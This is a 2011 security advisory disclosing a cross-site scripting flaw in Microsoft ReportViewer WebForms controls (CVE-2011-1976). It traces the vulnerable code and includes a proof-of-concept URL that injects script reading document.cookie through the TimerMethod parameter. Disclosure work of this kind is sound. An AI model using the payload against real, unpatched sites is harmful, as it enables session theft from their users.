==================================================
Cross-Site Scripting (XSS) in Microsoft ReportViewer Controls
Adam Bixby - Gotham Digital Science ([email protected])
Public Release Date: 8/9/2011
Confirmed Affected Software: Microsoft Report Viewer Redistributable 2005 SP1 and Microsoft Visual Studio 2005 Service Pack 1
Browser used for testing: IE8 (8.0.7601.17514)
Severity: High
MS Bulletin: MS11-067 - http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx
CVE: CVE-2011-1976

==================================================

1. Summary
   ==================================================
   The Microsoft ReportViewer Controls are a freely redistributable control that enables embedding reports in applications developed using the .NET Framework. A Cross-Site Scripting (XSS) vulnerability was found in the Microsoft.ReportViewer.WebForms.dll. The XSS vulnerability appears to affect all websites that utilize the affected controls.

==================================================
2. Technical Details

File: Microsoft.ReportViewer.WebForms.dll (PerformOperation() method of the SessionKeepAliveOperation class)
1) User controllable data enters via the "TimerMethod" URL parameter value and is assigned to the "andEnsureParam" string variable.

string andEnsureParam = HandlerOperation.GetAndEnsureParam(urlQuery, "TimerMethod");

2) The "andEnsureParam" variable with user-controllable input is then passed into the "s" string variable which is dynamically building a javascript block. The "s" variable is then passed to response.write(). Writing the un-validated data to the JS block creates the XSS exposure.

string s = string.Format(CultureInfo.InvariantCulture, "<html><body><script type=\"text/javascript\">parent.{0}();</script></body></html>", new object[] { andEnsureParam });
response.Write(s);

==================================================
3. Proof-of-Concept Exploit

This vulnerability can be exploited against websites that have deployed the vulnerable Microsoft.ReportViewer.WebForms.dll. You will note that since the data is being written into an existing Javascript block that the attacker does not need to include any opening or closing tags (i.e.,<img>, <script>, etc) to execute code.

Reproduction Request:
https://test.com/Reserved.ReportViewerWebControl.axd?Mode=true&amp;ReportID=&amp;lt;arbitraryIDvalue&amp;gt;&amp;ControlID=&amp;lt;validControlID&amp;gt;&amp;Culture=1033&amp;UICulture=1033&amp;ReportStack=1&amp;OpType=SessionKeepAlive&amp;TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert&#40;document.cookie&#41;;//&amp;CacheSeed=

(Note: During testing of this issue, it appeard as though a valid ControlID parameter value was needed to exploit this issue)

==================================================
4. Recommendation

Update to the latest versions. For more information please see http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx

==================================================
5. About Gotham Digital Science

Gotham Digital Science (GDS) is an information security consulting firm that works with clients to identify, prevent, and manage security risks. For more information on GDS, please contact [email protected] or visit http://www.gdssecurity.com.